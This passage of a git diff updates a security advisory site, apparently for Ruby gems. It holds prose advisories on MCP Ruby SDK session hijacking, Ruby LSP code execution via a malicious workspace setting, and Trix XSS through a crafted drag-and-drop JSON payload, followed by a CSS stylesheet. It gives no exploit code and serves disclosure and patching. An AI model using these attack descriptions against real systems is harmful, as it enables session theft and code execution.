-    vulnerability. For example: In the case of the Ruby SDK, the attacker
-    was able to hijack the stream and receive all the tool responses
-    belonging to the victim. The tool responses can be sensitive
-    confidential data.
-  cvss_v3: 8.2
-  patched_versions:
-  - ">= 0.9.2"
-  related:
-    url:
-    - https://www.cve.org/CVERecord?id=CVE-2026-33946
-    - https://github.com/modelcontextprotocol/ruby-sdk/releases/tag/v0.9.2
-    - https://github.com/modelcontextprotocol/ruby-sdk/security/advisories/GHSA-qvqr-5cv7-wh35
-    - https://github.com/modelcontextprotocol/ruby-sdk/blob/main/examples/streamable_http_server.rb
-    - https://github.com/modelcontextprotocol/ruby-sdk/commit/db40143402d65b4fb6923cec42d2d72cb89b3874
-    - https://hackerone.com/reports/3556146
-    - https://github.com/modelcontextprotocol/csharp-sdk/blob/main/src/ModelContextProtocol.AspNetCore/SseHandler.cs#L93-L97
-    - https://github.com/modelcontextprotocol/go-sdk/blob/main/mcp/streamable.go#L281C1-L288C2
-    - https://github.com/modelcontextprotocol/python-sdk/blob/main/src/mcp/server/streamable_http.py#L680-L685
-    - https://github.com/advisories/GHSA-qvqr-5cv7-wh35
----
+---
+layout: advisory
+title: 'CVE-2026-33946 (mcp): MCP Ruby SDK - Insufficient Session Binding Allows SSE
+  Stream Hijacking via Session ID Replay'
+comments: false
+categories:
+- mcp
+advisory:
+  gem: mcp
+  cve: 2026-33946
+  ghsa: qvqr-5cv7-wh35
+  url: https://github.com/modelcontextprotocol/ruby-sdk/security/advisories/GHSA-qvqr-5cv7-wh35
+  title: MCP Ruby SDK - Insufficient Session Binding Allows SSE Stream Hijacking via
+    Session ID Replay
+  date: 2026-03-27
+  description: |
+    ### Summary
+
+    The Ruby SDK's [streamable_http_transport.rb](https://github.com/modelcontextprotocol/ruby-sdk/blob/main/lib/mcp/server/transports/streamable_http_transport.rb)
+    implementation contains a session hijacking vulnerability. An attacker
+    who obtains a valid session ID can completely hijack the victim's
+    Server-Sent Events (SSE) stream and intercept all real-time data.
+
+    ### Details
+
+    **Root Cause**
+
+    The StreamableHTTPTransport implementation stores only one SSE stream
+    object per session ID and lacks:
+
+    - Session-to-user identity binding
+    - Ownership validation when establishing SSE connections
+    - Protection against multiple simultaneous connections to the same session
+
+    ### Impact
+
+    While the absence of user binding may not pose immediate risks if
+    session IDs are not used to store sensitive data or state, the
+    fundamental purpose of session IDs is to maintain stateful connections.
+    If the SDK or its consumers utilize session IDs for sensitive operations
+    without proper user binding controls, this creates a potential security
+    vulnerability. For example: In the case of the Ruby SDK, the attacker
+    was able to hijack the stream and receive all the tool responses
+    belonging to the victim. The tool responses can be sensitive
+    confidential data.
+  cvss_v3: 8.2
+  patched_versions:
+  - ">= 0.9.2"
+  related:
+    url:
+    - https://www.cve.org/CVERecord?id=CVE-2026-33946
+    - https://github.com/modelcontextprotocol/ruby-sdk/releases/tag/v0.9.2
+    - https://github.com/modelcontextprotocol/ruby-sdk/security/advisories/GHSA-qvqr-5cv7-wh35
+    - https://github.com/modelcontextprotocol/ruby-sdk/blob/main/examples/streamable_http_server.rb
+    - https://github.com/modelcontextprotocol/ruby-sdk/commit/db40143402d65b4fb6923cec42d2d72cb89b3874
+    - https://hackerone.com/reports/3556146
+    - https://github.com/modelcontextprotocol/csharp-sdk/blob/main/src/ModelContextProtocol.AspNetCore/SseHandler.cs#L93-L97
+    - https://github.com/modelcontextprotocol/go-sdk/blob/main/mcp/streamable.go#L281C1-L288C2
+    - https://github.com/modelcontextprotocol/python-sdk/blob/main/src/mcp/server/streamable_http.py#L680-L685
+    - https://github.com/advisories/GHSA-qvqr-5cv7-wh35
+---
diff --git a/advisories/_posts/2026-03-27-CVE-2026-34060.md b/advisories/_posts/2026-03-27-CVE-2026-34060.md
index 75cf2979..c3017206 100644
--- a/advisories/_posts/2026-03-27-CVE-2026-34060.md
+++ b/advisories/_posts/2026-03-27-CVE-2026-34060.md
@@ -1,66 +1,66 @@
----
-layout: advisory
-title: 'CVE-2026-34060 (ruby-lsp): Ruby LSP has arbitrary code execution through branch
-  setting'
-comments: false
-categories:
-- ruby-lsp
-advisory:
-  gem: ruby-lsp
-  cve: 2026-34060
-  ghsa: c4r5-fxqw-vh93
-  url: https://github.com/Shopify/ruby-lsp/security/advisories/GHSA-c4r5-fxqw-vh93
-  title: Ruby LSP has arbitrary code execution through branch setting
-  date: 2026-03-27
-  description: |2
-
-    ## Summary
-
-    The `rubyLsp.branch` VS Code workspace setting was interpolated without
-    sanitization into a generated Gemfile, allowing arbitrary Ruby code
-    execution when a user opens a project containing a malicious
-    `.vscode/settings.json`.
-
-    Other editors that support workspace setting that get automatically
-    applied upon opening the editor and trusting the workspace are also
-    impacted since the server is the component that performs the interpolation.
-
-    ## Details
-
-    The `branch` CLI argument passed to the `ruby-lsp` server was
-    interpolated in the generated `.ruby-lsp/Gemfile` without sanitization.
-     Editors that allow defining settings saved at the workspace level
-    (e.g.: `.vscode/settings.json`) that gets automatically applied open
-    the possibility to craft a malicious repository that once opened and
-    trusted in the editor would run arbitrary code.
-
-    ## Impact
-
-    Code execution with the privileges of the user who opens the malicious
-    project. Ruby LSP assumes workspace code is trusted and so opening
-    the editor on an untrusted workspace can lead to executing potentially
-    dangerous code.
-
-    ## Remediation
-
-    The `rubyLsp.branch` setting has been removed entirely. VS Code extensions
-    auto-update by default, so most users will receive the fix without
-    action. Users who have disabled auto-updates should update to extension
-    version >= 0.10.2.
-
-    The `branch` CLI flag was also entirely removed from the `ruby-lsp`
-    gem. For users that don't add `ruby-lsp` to their Gemfiles, the
-    server should auto-update. Users with the `ruby-lsp` in the Gemfile
-    and locked to a specific version should update to >= 0.26.9.
-  cvss_v2: 7.5
-  cvss_v3: 9.8
-  cvss_v4: 7.1
-  patched_versions:
-  - ">= 0.26.9"
-  related:
-    url:
-    - https://www.tenable.com/cve/CVE-2026-34060
-    - https://github.com/Shopify/ruby-lsp/security/advisories/GHSA-c4r5-fxqw-vh93
-    - https://github.com/Shopify/ruby-lsp/releases/tag/v0.26.9
-    - https://github.com/advisories/GHSA-c4r5-fxqw-vh93
----
+---
+layout: advisory
+title: 'CVE-2026-34060 (ruby-lsp): Ruby LSP has arbitrary code execution through branch
+  setting'
+comments: false
+categories:
+- ruby-lsp
+advisory:
+  gem: ruby-lsp
+  cve: 2026-34060
+  ghsa: c4r5-fxqw-vh93
+  url: https://github.com/Shopify/ruby-lsp/security/advisories/GHSA-c4r5-fxqw-vh93
+  title: Ruby LSP has arbitrary code execution through branch setting
+  date: 2026-03-27
+  description: |2
+
+    ## Summary
+
+    The `rubyLsp.branch` VS Code workspace setting was interpolated without
+    sanitization into a generated Gemfile, allowing arbitrary Ruby code
+    execution when a user opens a project containing a malicious
+    `.vscode/settings.json`.
+
+    Other editors that support workspace setting that get automatically
+    applied upon opening the editor and trusting the workspace are also
+    impacted since the server is the component that performs the interpolation.
+
+    ## Details
+
+    The `branch` CLI argument passed to the `ruby-lsp` server was
+    interpolated in the generated `.ruby-lsp/Gemfile` without sanitization.
+     Editors that allow defining settings saved at the workspace level
+    (e.g.: `.vscode/settings.json`) that gets automatically applied open
+    the possibility to craft a malicious repository that once opened and
+    trusted in the editor would run arbitrary code.
+
+    ## Impact
+
+    Code execution with the privileges of the user who opens the malicious
+    project. Ruby LSP assumes workspace code is trusted and so opening
+    the editor on an untrusted workspace can lead to executing potentially
+    dangerous code.
+
+    ## Remediation
+
+    The `rubyLsp.branch` setting has been removed entirely. VS Code extensions
+    auto-update by default, so most users will receive the fix without
+    action. Users who have disabled auto-updates should update to extension
+    version >= 0.10.2.
+
+    The `branch` CLI flag was also entirely removed from the `ruby-lsp`
+    gem. For users that don't add `ruby-lsp` to their Gemfiles, the
+    server should auto-update. Users with the `ruby-lsp` in the Gemfile
+    and locked to a specific version should update to >= 0.26.9.
+  cvss_v2: 7.5
+  cvss_v3: 9.8
+  cvss_v4: 7.1
+  patched_versions:
+  - ">= 0.26.9"
+  related:
+    url:
+    - https://www.tenable.com/cve/CVE-2026-34060
+    - https://github.com/Shopify/ruby-lsp/security/advisories/GHSA-c4r5-fxqw-vh93
+    - https://github.com/Shopify/ruby-lsp/releases/tag/v0.26.9
+    - https://github.com/advisories/GHSA-c4r5-fxqw-vh93
+---
diff --git a/advisories/_posts/2026-03-29-GHSA-53p3-c7vp-4mcc.md b/advisories/_posts/2026-03-29-GHSA-53p3-c7vp-4mcc.md
new file mode 100644
index 00000000..466c3155
--- /dev/null
+++ b/advisories/_posts/2026-03-29-GHSA-53p3-c7vp-4mcc.md
@@ -0,0 +1,52 @@
+---
+layout: advisory
+title: 'GHSA-53p3-c7vp-4mcc (action_text-trix): Trix is vulnerable to XSS through
+  JSON deserialization bypass in drag-and-drop (Level0InputController)'
+comments: false
+categories:
+- action_text-trix
+advisory:
+  gem: action_text-trix
+  ghsa: 53p3-c7vp-4mcc
+  url: https://github.com/basecamp/trix/security/advisories/GHSA-53p3-c7vp-4mcc
+  title: Trix is vulnerable to XSS through JSON deserialization bypass in drag-and-drop
+    (Level0InputController)
+  date: 2026-03-29
+  description: |
+    ### Impact
+
+    The Trix editor, in versions prior to 2.1.18, is vulnerable to XSS
+    when a crafted `application/x-trix-document` JSON payload is dropped
+    into the editor in environments using the fallback Level0InputController
+    (e.g., embedded WebViews lacking Input Events Level 2 support).
+
+    The `StringPiece.fromJSON` method trusted `href` attributes from the
+    JSON payload without sanitization. An attacker could craft a draggable
+    element containing a `javascript:` URI in the href attribute that,
+    when dropped into a vulnerable editor, would bypass DOMPurify
+    sanitization and inject executable JavaScript into the DOM.
+
+    Exploitation requires a specific environment (Level0InputController
+    fallback) and social engineering (victim must drag and drop
+    attacker-controlled content into the editor). Applications using
+    server-side HTML sanitization (such as Rails' built-in sanitizer)
+    are additionally protected, as the payload is neutralized on save.
+
+    ### Patches
+
+    Update Recommendation: Users should upgrade to Trix editor
+    version 2.1.18 or later.
+
+    ### References
+
+    The XSS vulnerability was responsibly reported by Hackerone
+    researcher [newbiefromcoma](https://hackerone.com/newbiefromcoma).
+  patched_versions:
+  - ">= 2.1.18"
+  related:
+    url:
+    - https://github.com/basecamp/trix/security/advisories/GHSA-53p3-c7vp-4mcc
+    - https://github.com/basecamp/trix/releases/tag/v2.1.18
+    - https://github.com/basecamp/trix/commit/9c0a993d9fc2ffe9d56b013b030bc238f9c0557c
+    - https://github.com/advisories/GHSA-53p3-c7vp-4mcc
+---
diff --git a/assets/css/advisory.css b/assets/css/advisory.css
new file mode 100644
index 00000000..8fb75633
--- /dev/null
+++ b/assets/css/advisory.css
@@ -0,0 +1,171 @@
+/* Advisory Template Styles */
+
+.advisory-header {
+  border-bottom: 2px solid #e1e4e8;
+  padding-bottom: 1rem;
+  margin-bottom: 2rem;
+}
+
+.advisory-header h2 {
+  color: #24292e;
+  font-size: 1.8rem;
+  margin-bottom: 0.5rem;
+}
+
+.advisory-date {
+  color: #586069;
+  font-size: 0.9rem;
+  margin: 0;
+}
+
+.advisory-identifiers {
+  list-style: none;
+  padding: 0;
+  background: #f6f8fa;
+  border: 1px solid #e1e4e8;
+  border-radius: 6px;
+  padding: 1rem;
+}
+
+.advisory-identifiers li {
+  margin-bottom: 0.5rem;
+}
+
+.advisory-identifiers li:last-child {
+  margin-bottom: 0;
+}
+
+.severity-section {
+  background: #fff5b4;
+  border: 1px solid #d1d5da;
+  border-radius: 6px;
+  padding: 1rem;
+  margin-bottom: 1rem;
+}
+
+.cvss-score {
+  margin-bottom: 0.5rem;
+}
+
+.cvss-score:last-child {
+  margin-bottom: 0;
+}
+
+.severity-none {
+  color: #28a745;
+  font-weight: bold;
+}
+
+.severity-low {
+  color: #28a745;
+  font-weight: bold;
+}
+
+.severity-medium {
+  color: #ffc107;
+  font-weight: bold;
+}
+
+.severity-high {
+  color: #fd7e14;
+  font-weight: bold;
+}
+
+.severity-critical {
+  color: #dc3545;
+  font-weight: bold;
+}
+
+.version-list {
+  display: flex;
+  flex-wrap: wrap;
+  gap: 0.5rem;
+  margin-bottom: 1rem;
+}
+
+.version-badge {
+  display: inline-block;
+  padding: 0.25rem 0.5rem;
+  border-radius: 3px;
+  font-size: 0.875rem;
+  font-weight: 500;
+}
+
+.version-badge.unaffected {
+  background-color: #d4edda;
+  color: #155724;
+  border: 1px solid #c3e6cb;
+}
+
+.version-badge.patched {
+  background-color: #cce5ff;
+  color: #004085;
+  border: 1px solid #b3d7ff;
+}
+
+.version-badge code {
+  background: none;
+  padding: 0;
+  color: inherit;
+  font-size: inherit;
+}
+
+.no-patches {
+  color: #dc3545;
+  font-style: italic;
+}
+
+.advisory-description,
+.advisory-impact,
+.advisory-workarounds {
+  background: #f8f9fa;
+  border-left: 4px solid #007bff;
+  padding: 1rem;
+  margin-bottom: 1rem;
+}
+
+.advisory-impact {
+  border-left-color: #dc3545;
+}
+
+.advisory-workarounds {
+  border-left-color: #28a745;
+}
+
+.patch-list {
+  background: #f6f8fa;
+  border: 1px solid #e1e4e8;
+  border-radius: 6px;
+  padding: 1rem;
+}
+
+.patch-list li {
+  margin-bottom: 0.5rem;
+}
+
+.patch-list li:last-child {
+  margin-bottom: 0;
+}
+
+.advisory-credits {
+  background: #fff3cd;
+  border: 1px solid #ffeaa7;
+  border-radius: 6px;
+  padding: 1rem;
+}
+
+.advisory-credits ul {
+  margin-bottom: 0;
+}
+
+/* Responsive design */
+@media (max-width: 768px) {
+  .version-list {
+    flex-direction: column;
+  }
+  
+  .version-badge {
+    display: block;
+    text-align: center;
+  }
+}
\ No newline at end of file